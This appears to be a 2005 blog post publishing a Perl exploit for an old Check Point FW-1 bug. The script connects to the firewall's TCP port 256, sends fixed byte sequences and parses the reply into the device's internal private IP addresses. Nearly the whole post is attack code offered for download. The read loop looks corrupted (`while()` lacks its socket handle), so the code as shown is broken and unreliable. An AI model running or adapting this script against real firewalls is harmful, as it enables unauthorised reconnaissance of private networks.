martes, 13 de diciembre de 2005

Get private address from fw-1 (old bug)

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use IO::Socket;

my ($bytes, $host, @hosts) = ();
my $sock = new IO::Socket::INET(PeerAddr => $ARGV[0], PeerPort => 256,
Proto => 'tcp') or die "ERROR! $!\n";
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";
while() { $bytes .= unpack("H*",$_); }
print "fw1 string: $bytes\n";
print substr ($bytes, 16)."\n";
my $i = 0;
foreach ((substr $bytes, 16) =~/(.{8})/g) {
$host = ();
foreach my $ip (/(.{2})/g) {
$host .= hex($ip).".";
} $host =~ s/\.$//;
last if $host =~ /0\.0\.0/; push(@hosts, $host);
}
foreach (@hosts) { $i++; print "ipaddr[$i]: $_\n"; }

download pl